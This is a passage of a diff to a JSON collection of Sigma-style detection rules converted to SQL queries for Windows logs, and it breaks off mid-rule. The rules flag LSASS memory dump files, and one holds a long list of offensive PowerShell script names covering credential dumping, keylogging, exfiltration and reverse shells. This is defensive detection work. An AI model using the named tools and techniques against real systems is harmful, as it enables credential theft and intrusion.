'%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.discovery" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -798,3013 +733,3002 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "status": "experimental", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename 